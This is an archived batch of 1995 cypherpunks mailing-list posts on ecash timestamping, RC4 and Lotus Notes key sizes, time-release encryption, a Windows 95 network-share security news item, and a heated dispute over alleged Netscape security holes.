-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.phoenix.net>
Date: Mon, 13 Nov 1995 17:17:12 +0800
To: cypherpunks@toad.com
Subject: Re: mailing list.
Message-ID: <199511110707.BAA04164@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Nov 95 at 13:34, David.Y@freedomnet.com (David Y) wrote:

> Subject:       mailing list.

> Please put me on your mailing list, thanks.

Sure.  Consider it done.

-------------------------
Weak attempt at crypto relevance:

Couldn't trusted date/time-stamping signing robots be used
to establish that offline ecash particles had reached
certain points in their journey?  Might not a bank say
that in the event of a dispute, it will accept the ecash
copy signed earliest by Framis Signer or specified
alternate with claimant's ID inside the disposable
signature wrapper?  I suppose one might just as well 
authenticate the ecash with the bank itself, except that 
the signed copy allows withholding identity unless and 
until there is a dispute.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 16:33:42 +0800
To: cypherpunks@toad.com
Subject: Love Bugs
Message-ID: <199511110054.BAA15772@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Nov 11 WSJ reports on the scare tactics of security
consultants in the U.S. and by their co-conspiring
counterparts -- spies -- abroad:

Richard Heffernan, an information-security specialist for
30 years, said his clients sometimes return to their
hotel rooms to find their belongings ransacked,
especially in Europe. Some European companies will pay as
much as $10,000 for the laptop of a Fortune 500
executive, he adds.

Watch out for tiny surveillance tools. In 1992, the
Canadian government reportedly warned businessmen that
the French intelligence service was bugging airline seats
and using undercover agents as flight attendants.
Penlight cameras placed above airline seats can make
readable photos of laptop screens.

Spies on planes can overhear conversations from several
seats away. Look for them in business suits with plenty
of luggage, says security consultant Kevin Coffey. "These
guys fit in."

Another consultant estimates that 45% of bugs are on fax
machines, and one group of U.S. executives inadverdently
gave their secrets to the competition by using the fax
machine at Moscow's upscale Metropol Hotel, which is
staffed with former FBI and KGB operatives.

If you are carrying extremely sensitive information, be
especially paranoid.

All this may be too much for some companies, who say they
don't have time to evade possible spies. Rather than take
the trouble, some companies end up postponing business
plans aborad, saying, "Forget it. We'll come back in a
few years."

That's what they said at the office, now listen to the bug
up Gigi's.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Mon, 13 Nov 1995 17:13:41 +0800
To: Charlie Kaufman/Iris <Charlie_Kaufman/Iris.IRIS@iris.com>
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <199511110613.WAA18615@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Nov 95 11:15:42 EDT, Charlie Kaufman wrote:

>>1)  What is the key size used by the USA licensed version?
>>
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
>encryption in the exportable version and bigger keys for signatures in all
>versions and for encryption in the USA version. I'm not sure I'm allowed to say
>what the key size will be ahead of the product shipping.

I would assume since they are using a key size >40 bit, it is used for
authentication only, not for data encrytion, that would skirt the ITAR
regs.  If fact according to the docs, there is no data encryption when
connecting to an international version server, regardless of the
client version.

I would assume that a >512 bit key in V4 would allow upwards of 1024
or better.  That should be sufficient for now.

>>2)  Considering RC4 is a proprietary scheme, have there been any
>>concerted efforts to validate it's strength or lack of?  If so, could
>>you give a pointer to any documents I could review.
>>
>There has been considerable discussion of the security of RC4 on this list, and
>some subtle (i.e. worrisome but not disasterous) weaknesses have been
>found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
>to date because it does not encrypt recognizable plaintext with the first few
>bytes of the RC4 stream.

My understanding was that the problems exposed with RC4 that you
mentioned, were with the particular implemenation by Netscape.  I
guess I better go back to the archive and do some reading. :-)

Thanks, for the info.

Bob Glassley


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKQ+hW7xvKhVs/sNAQFgfgP+Jekr28ZImaynnvuEpbZu5imS0Jm8bPwQ
iDw0ZIcF23ngSjb1Z4srt9cSJmL1zV2dEFyxSlXs7CWzBmlw8dSCvz6ArftetRYY
aYe1qwt+bXpGMWplQKUOG/dNk/n52sn1mHNPEJoj/V4G4iAXfDoOokL+zdSJ1Cbk
LuFl+F1M/Zc=
=FHxS
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Mon, 13 Nov 1995 17:23:07 +0800
To: cypherpunks@toad.com
Subject: hacker's dream
Message-ID: <9511110629.AA27945@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Windows 95 Is A Hacker's Dream Over The Internet
CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
Internet, could be a dream made in hacker heaven. From seasoned propeller
heads Newsbytes has contacted, it looks like Windows 95 could be more of a
security nightmare than was first thought.

This is especially true where fixed link companies are concerned. An
investigation of the new operating system, when hooked onto the Internet,
leaves computers wide open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to hacking the moment
they access the Internet, claim some analysts.

Worse, they may never know it has been done. Using a simple Unix command, a
hacker can locate the IP (Internet protocol) address of the subscriber logged
into an Internet service provider. Then he needs only one more thing; a
logged-on Internet user using Microsoft's new operating system.

For businesses with leased line Internet links, it can happen at any time,
day or night. Once the IP address has been noted, the hacker simply creates a
file through DOS on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names on the IP, or
Internet provider's port -- the system then refreshes and remaps itself in
preparation to be accessed by the hacker's computer.

Because Windows 95 is designed with a networking capability, it leaves all
computers in the office open to illegal access. Once the hacker has called up
his Map Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that need be done then is
to put in a common drive name, most obviously "C:\." For networked machines,
the default "C$" is common.

This gives access to all files on the subscriber's drive. While Windows 95
allows the user to protect the drive by giving it a password, computer
experts Newsbytes talked to said that device won't necessarily lock out
intruders. Because the operating system has no "audit" trail -- in other
words, it does not log who or how someone is accessing the drive -- a hacker
can spend weeks trying to discover the password. Password search programs,
like Cracker, are readily available and can break through most simple
password sequences.

(Joel McCormick & I.T. Daily/19951109)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <j.fletcher@psych.stir.ac.uk>
Date: Tue, 14 Nov 1995 04:32:02 +0800
To: cypherpunks@toad.com
Subject: Q: Bookshop in Seattle
Message-ID: <Pine.HPP.3.91.951111082012.10146A-100000@loyal.stir.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cyptography ? 

Sincerely,

-Jon

--
  Jonathon Fletcher, 
  j.fletcher@stirling.ac.uk 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 13 Nov 1995 10:26:26 +0800
To: cypherpunks@toad.com
Subject: "conspiracypunks"
Message-ID: <199511111515.JAA27130@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


May have been silenced, but the Slick criminality story
continues apace, and it's fitting that the most Nixonian
president since Tricky himself should have a "Deep Throat,"
no matter how some of you feel about Orlin, who is, BTW,
doing thejob the media claims to be responsible for.
[Don't Flame C2]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Tue, 14 Nov 1995 05:28:24 +0800
To: cypherpunks@toad.com
Subject: URL Version for ALPHA.C2.ORG FAQ
Message-ID: <199511111848.KAA22368@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Remailer Users,
 
Due to popular demand, I've created a URL version of my ALPHA.C2.ORG
Remailer FAQ. Please link to this address:
 
      http://www.well.com/user/abacard/alpha.html
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 14 Nov 1995 08:13:19 +0800
To: bryce@colorado.edu
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <30a4ebe65774002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Bryce said:
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I don't really understand the use for "can't be opened until
> Christmas" tricks.  If you don't want anyone to see your info until
> Christmas then just don't give them a copy until then!  If you want
> to prove that you have it but not let them see it until later then
> do timestamping of hashes, zero-knowledge proofs and so forth.
> 
> 
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

An application that I've seen is financial data, more specifically
MBS payment info. There is 100s of megabytes of data, and it was
encrypted so that nobody could use the info before the release
date/time, but the data needed to be transmitted prior to release
because of bandwidth constraints. In this case, it wasn't real
time-release, because the key was manually transmitted to release
the information rather than implement some sort of "do not decrypt
until" scheme.


-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 18:58:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511112036.MAA24650@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
Expert", from Netscape Communications: 

>> Meanwhile people are having their PGP keyrings collected, their passwords
>> monitorred, and all of the information -- even information which they have
>> NOT posted to Usenet, information that is simply on their personal hard
>> drives, or on a private corporate network that is behind a firewall --
>> collected by anyone who actualy understands *how* to use Netscape
>> Navigator's standard features to do it.
>
>  Please show us some proof.  All you have done is post unfounded
>allegations backed up by flawed logic and a misunderstanding of the
>technology.  Send me a URL, and I will point my navigator at it.  If you
>can collect my PGP key ring you can gloat here or anywhere else. 

I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
spokesperson, I think that you should rethink what you're suggesting. 
Your tactics won't serve your personal interests on this one.  I really
would recommend that you come clean.  This is not about "gloating".  I 
really take very little pleasure in this.

It's really not a good plan, to suggest that I contravene your "license
agreement" or break the laws of my country to satisfy some ego-centred
game on your part not to face the FACT, that you have been caught. 

Not arrested yet, but you have been found out.

Or as I wrote some weeks ago, in some oddly inspired flash ... You're
"Hoist by your own 'petar" ... (which is a quote that Johnnie Cochrane
used during the OJ trial ... a quote taken from Shakespeare which
*translated* means that you've been blown up by your own bomb.)

I am not nearly so *SLOW* as to offer you ammunition to use against me.
Your license agreement -- pardon me -- Netscape's license agreement
explicitly sets out the limitations underwhich I must function.  An 
agreement, I respect.  It states in part. 

> RESTRICTED USE.  You may not copy the software, except for backup or
> archival purposes.  Any such copy made by you shall be subject to this
> Agreement and shall contain all of Netscape's notices regarding
> copyrights, trademarks and other proprietary rights as contained in the
> Software originally provided to you.  You may not lend, rent, lease or
> otherwise transfer the Software.  The Software is protected by the
> copyright laws of the United States and international copyright
> treaties.

Ya see ... "Jeff" ... I actually respect that ... and I'll operate within
those constraints on this one.  Later the Agreement continues with more
legalistic boiler plate and says,

> TITLE.  Title, ownership rights, and intellectual property rights in
> and to the Software and Documentation shall remain in Netscape and/or
> its suppliers.  This Agreement does not include the right to sublicense
> the Software and is personal to you and therefore may not be assigned
> (by operation of law or otherwise) or transferred without the prior
> written consent of Netscape.  You acknowledge that the Software in
> source code form remains a confidential trade secret of Netscape and/or
> its suppliers and therefore you agree not to attempt to decipher,
> decompile, disassemble or reverse engineer the Software or allow others
> to do so, except to the extent applicable laws specifically prohibit
> such restriction.  You further agree not to modify or create derivative
> works of the Software.

Now how do you expect me ... poor little "Alice" ... to exploit KNOWN
documented and undocumented security holes in Netscape Navigator ... holes
which Netscape willfully and deliberately or alternatively through the
grossest of negligence, engineered into the product, when I have
implicitly agreed not to violate your License Agreement. 

My hands are kindof tied, aren't they "Jeff".  

I need written permission to do that, and considerring that Netscape
hasn't even *bothered* to acknowledge email which was sent to them, email
which asked whether they will voluntarily open up their experimental MIME
objects to IETF review, I somehow doubt that permission will be
forthcoming. 

You can't suck and blow at the same time Jeff. 

Maybe, what I'll do ... is snail mail Netscape and ask for explicit
permission to do just that.  I'll also ask for access to all of the source
code, and maybe at the same time ask for the email address of Dr James H.
Clark, since the Netscape postmaster doesn't seem to reply to email.

Afterall, he DOES know about this issue, doesn't he??  Dr. James H. Clark 
has been briefed, I hope ...

Let's see ... Dr. James H Clark, founder of Silicon Graphics Inc, and 
co-founder of Netscape Communications Corp. does know about this "itsy 
bitsy" "teeny-weeny" problem doesn't he??  

I mean there _will_ be questions as to what he knew and when he knew it and
what he did about it.  But that'll be his baby ... and I'll let him speak 
for himself on that one. 

But the other question ... the question of what the other co-founder of
Netscape Communications Corp., Marc Andreessen, knew is not a subject for 
speculation.  We know that.

Marc Andreessen, vice-president of technology at Netscape, and creator of 
NCSA Mosaic's knowledge is clear.  We "know" what Marc knew. 

Marc won't be able to pull an "Ollie North" and redact the public domain
electronic archives.  It's clear what he knew and when he knew it. 

A simple one line command tells all ... a command like, maybe:

           mget rfc* |grep Andreessen

run at one of the public domain archives might give us some clues and
pointers to anyone who might be familiar with how the net works.  Then a
little follow up and search of some mailing lists ... lists of the
Internet Engineering Task Force ... cross-referencing the records of the
IETF might tell us what Marc knew and when. 

NOTHING which has been written, is gone, is it Jeff??  There are no hidden
acts, and there are no solitary acts when it comes to the Network.  And 
isn't that a shame, "Jeff"??

But then what would I know about such things ... I don't *understand* the 
technology, do I "Jeff", my boy??

Simple question, once again ... does Netscape have any comment to make?  
Or does it continue to say "no comment".  

Will Dr. James H. Clark, and/or Marc Andreessen please step forward 
and address this issue at this time?  The international community is 
beginning to loose its patience.


> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 14 Nov 1995 05:33:21 +0800
To: sameer <sameer@c2.org>
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <199511111953.MAA26503@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Bryce wrote:
>
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?


 Sameer wrote:
> 
> 	Suppose you die.


Hey!  Who do you think you are?


:-)


Just kidding.  When I woke up this morning I realized what I was
missing:  the decryption might be out of your hands, such as when
you die, or you might *want* it to be out of your hands for some
other reason.


With that in mind, I can think of only one unalterable lower-limit
on the time of as decryption--  the speed of light.  Suppose you
encrypt your data with successive layers of keys, K1-Kn.  Then you
encrypt each key with its predecessor, encrypting Kn with Kn-1,
encryping Kn-1 with Kn-2, etc.  Destroy all copies of unencrypted
keys except for K1, which has not been encrypted.  Now put all
odd-numbered keys in location A and all even-numbered keys in
location B, which is 1 light minute from location A.  Once an agent
has received Key 1, it will take at least n minutes to decrypt 
the data.  Of course, the agent could just take copies of all of the 
keys from location B on some physical media and transport the media 
to location A, which would make the lower bound on time to be "much 
longer than 1 minute".


Hm.  Suppose the n different keys are in n different physical
locations, and the agent does not know where the k+1 location is
until he decrypts the material at the k location.  The "scavenger
hunt" scheme for timed decryption.  Of course this doesn't mean that
you have to bury your crypto box and make a map with an "X" marking
the spot.  Each key could be held by a crypto box which is
publically accessible on the Net.  The important thing is that
the decrypting agent can't retrieve the k+1 piece until he has 
decrypted the k piece.  Then the lower bound on time of decryption 
is...  um...  Well it depends on the location of the decrypting agent 
with respect to the locations of the n pieces.  (Neglecting, still, 
transmission overhead and decryption time.)  I'm not sure what the 
lower bound actually is, but it can be increased simply by adding more 
pieces to the puzzle.


A single station could serve up multiple pieces.  It would only
reveal the k piece if the querying agent can prove that he has the 
k-1 piece.  Of course if the total number of stations is small then 
the "physically move the pieces" trick might work.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKT/JPWZSllhfG25AQFDlwQAhWHB//NeYM8vylQcBDWbNmScrVoCjUdR
TmXVDtnLCZcrAv233l+H3SpdEQmMwQwQCQrM52AreQWMYTSBLuxqr7j9SbpZjek2
FFCMDezbvBPX3ZIuX3SVwrdHa6dm4qgGtpKyfFHxDAn39p+T/HJ+uKaZbA7YVbTC
U6NnnfYv1k8=
=/2+H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:21:32 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: coding and nnet's
In-Reply-To: <199511102255.OAA10734@netcom16.netcom.com>
Message-ID: <199511111800.NAA23831@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At 14:17 11/10/95 -0500, Atp3000@aol.com wrote:
> >I just resently got interested in coding and cryptography, and I was
> >wondering if you could suggest 3 or 4 papers that adresses the aplication of
> >neural networks in cryptography.
> 
> Perhaps neural nets could be used in an unknown plain text, brute force
> attack to automatically select possible decryptions for human examination. 
> I don't know of any papers on the subject.

I remember seeing a good paper by our own David Wagner on how to do
this without anything more than some ordinary statistics -- no
complicated junk required. David, if you are reading this, could you
comment?

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:19:53 +0800
To: cypherpunks@toad.com
Subject: Re: Love Bugs
In-Reply-To: <199511110054.BAA15772@utopia.hacktic.nl>
Message-ID: <199511111814.NAA23863@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> The Nov 11 WSJ reports on the scare tactics of security
> consultants in the U.S. and by their co-conspiring
> counterparts -- spies -- abroad:

There is no November 11th WSJ -- the Wall Street Journal is only
published Monday through Friday.

The topic you are covering isn't especially relevant, either.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:12:16 +0800
To: jgrubs@left.webcasters.com
Subject: Re: POTP Security
In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <199511111827.NAA23896@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jgrubs@left.webcasters.com writes:
> >The first commercially available implementation of our 
> >POTP (Power One Time Pad) encryption algorithm. The package includes 
> >a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
> >a stand alone file encryption program.
> 
> What level of security does this cute, little puppy provide???

None whatsoever is my guess.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:18:48 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <199511111833.NAA23915@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



>  As far as marketing goes, this product is not going to disapear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.

They would be smart not to give the names of their clients because
good samaritans might inform them of the quality of their product.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 14 Nov 1995 13:28:01 +0800
To: j.fletcher@stirling.ac.uk
Subject: Re: Q: Bookshop in Seattle
Message-ID: <9511112134.AA29395@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cyptography ? 
.......................................

 Tower Books (I've seen it advertised there)
 The University BookStore (probably)
 Barnes & Noble (potentially)


  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 14 Nov 1995 08:00:34 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <30A52187.44EB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Glassley wrote:
> >>2)  Considering RC4 is a proprietary scheme, have there been any
> >>concerted efforts to validate it's strength or lack of?  If so, could
> >>you give a pointer to any documents I could review.
> >>
> >There has been considerable discussion of the security of RC4 on this list, and
> >some subtle (i.e. worrisome but not disasterous) weaknesses have been
> >found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
> >to date because it does not encrypt recognizable plaintext with the first few
> >bytes of the RC4 stream.
> 
> My understanding was that the problems exposed with RC4 that you
> mentioned, were with the particular implemenation by Netscape.  I
> guess I better go back to the archive and do some reading. :-)

Some RC4 keys that begin with specific values make it somewhat easier to
guess the first few bytes of the encrypted data.  This is a (probably
minor) weakness of RC4, and is in no way specific to Netscape.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 14 Nov 1995 18:54:31 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <v02120d05accab753260f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>An application that I've seen is financial data, more specifically
>MBS payment info.

In the real world, there's a trustee/nominee of some sort who does this.
What's that to keep that from happening on the net, just like our much
maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
escrow agent...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Mon, 13 Nov 1995 15:45:44 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <nuRpw4B4GnSU088yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <951110141713_18585763@mail04.mail.aol.com>, Atp3000 wrote:

>cypherpunks!
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication
>of neural networks in cryptography.



I just greped through "Abstracts in Cryptology" back to 1980 and
"Computer and Communications Security Reviews" up until September
1994 searching for the terms "neural" and "genetic."  The results below
show no evidence of research into the use of neural networks applied
to problems of cryptanalysis (in contrast to genetic algorithms). They
do however indicate their potential utility in such areas as transaction
and traffic analysis, as well as some types of biometric identity
authentication.

I wouldn't be surprised to learn of somebody like FinCEN using
neural-net systems to do pattern analysis on funds transfers and
the like, or the NRO or NSA investing research money into investigating
the usefulness of NNs for image processing or for scanning raw ELINT,
SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

While NNs may not be of direct relevance to cryptanalysis, I suspect
they are, or will be, of great relevance to the task of identifying
what communications should be cryptanalyzed or otherwise scrutinized.
Especially given the high volume of traffic our 'thinkpol' aspire to
be able to listen to.



 `The use of genetic algorithms in cryptanalysis'
 RA  Matthews, Cryptologia  v  17  no 2 (April 93) pp  187  - 201

 The author presents a genetic system for solving simple
 transpositions.  Candidate column orders are assessed for fitness using
 digram frequencies, and the best of them are used to breed a new
 generation of candidates, using column rotations and swaps as mutation
 operators.  The algorithm was useful at finding partial anagrams to aid
 manual solution.


 `Use  of a genetic algorithm in the cryptanalysis of simple substitution
 ciphers'
 R Spillman, M Janssen, B Nelson, M Kepner, Cryptolo gia v 17 no 1
 (Jan 93) pp 31 - 44

 The  authors report using a genetic algorithm to solve monoalphabetic
 substitutions. Randomly chosen keys were evaluated for fitness using
 letter and diagram frequencies, and the fittest candidates were then
 `mated' and subjected to mutation to provide the next generation of
 keys.  The `mating' operation used a selective crossover, in which the
 `best'character of each key was passed on.


 `Tearing up the rules'
 P Sampson, Banking Technology (Nov 93) pp 26 - 30

 Mellon Bank has installed a neural-net-based monitoring system which
 checks card transactions every two hours and looks for abnormal
 activity.  It is claimed to be substantially more effective than
 rule-based systems.


 `Cryptanalysis of knapsack ciphers using genetic algorithms'
 R Spillman, Cryptologia  v XVII no 4 (Oct 93) pp  367 - 377

 The author describes the design and use of a genetic algorithm to
 attack small trap do or knap-sacks and gives performance data to show
 that it functions 50 - 100 times faster than exhaustive search.


 `Neural net works: the way forward?'
 R Martin, Cards International no 99 (9/12/93)  p 9

 Neural networks are in use to detect abnormal card transactions in
 Mellon Bank and the Euro card Netherlands network, and both claimed that
 the system would pay for itself in 1-2 years.


 `Identity Verification using Weighted Personal Characteristics'
 Y Yamazaki, N Komatsu, M Tsuchiya, SCIS 94 paper 5C (in Japanese)

 The authors study whether characteristics of a person's handwriting may
 be used to authenticate that person.  They have used a neural net to
 distinguish persons successfully according to the angles between written
 strokes.


 `Comments on "Cryptanalysis of Knapsack Ciphers Using Genetic
 Algorithms" '
 F Rubin, Cryptologia v XVIII no 2 (April 1994) pp 153 - 154

 The author criticises Spillman's use of genetic algorithms to attack
 knapsack ciphers as ineffective against the kind of knapsacks
 actually proposed for non trivial cryptographic use.


 `Securenet: a network-oriented intelligent intrusion prevention and
 detection system'
 P Sprirakis, S Katsikas, D  Gritzalis, F Allegre, D Androutsopoulos,
 J Darzentas, C Gigante, D Karagiannis, H Putkonen, T Spyrou,  IFIP
 SEC  94  paper  E2

 This paper describes SECURENET, an intrusion detection system being
 built as an EC RACE project to protect integrated broadband
 communications. It uses a number of technologies, such as neural
 networks and secure distributed computation, to detect and classify
 attacks in real time.


 `Using  a  genetic algorithm for optimizing fixed polarity Reed-Muller
 expansions of Boolean functions'
 JF Miller, H Luchian, PV G Bradbeer, PJ Barclay , International Journal
 of Electronics v 76 no 4 (Apr 94) pp 601 - 610.

 The authors report a genetic algorithm which gets good sub-optimum
 Reed-Muller expansions of Boolean functions more quickly than previous
 techniques.



- -Michael


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKUpo9GJlWF+GPx9AQHuiQP8Dkp4o23j06TJCprZh7AYYEBH+IJQZzQW
wtlY+SfOzvcu+zEbQcj6q5G/feM7Ld1cmB/GK3u8qBPnM1OOQxxtvkR7dx//7svx
1P/E926zIOLZ3Q7FZqVLrsUdYJuKob+TXC2B4wMIQTFKXrJ0kNWEXvL4UpH26KkD
FEBXOQWnm8k=
=G5N2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 14 Nov 1995 07:56:16 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511112036.MAA24650@jobe.shell.portal.com>
Message-ID: <199511112259.RAA20991@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
> Expert", from Netscape Communications: 
> >  Please show us some proof.  All you have done is post unfounded
> >allegations backed up by flawed logic and a misunderstanding of the
> >technology.  Send me a URL, and I will point my navigator at it.  If you
> >can collect my PGP key ring you can gloat here or anywhere else. 
> 
> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
> spokesperson, I think that you should rethink what you're suggesting. 
> Your tactics won't serve your personal interests on this one.  I really
> would recommend that you come clean.  This is not about "gloating".  I 
> really take very little pleasure in this.


  Jeff, I think it's in your best interest to not waste your time
responding to this moron (who bears many features in common with
Detweiler)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 13 Nov 1995 10:10:42 +0800
To: "James A. Donald" <jamesd@echeque.com>
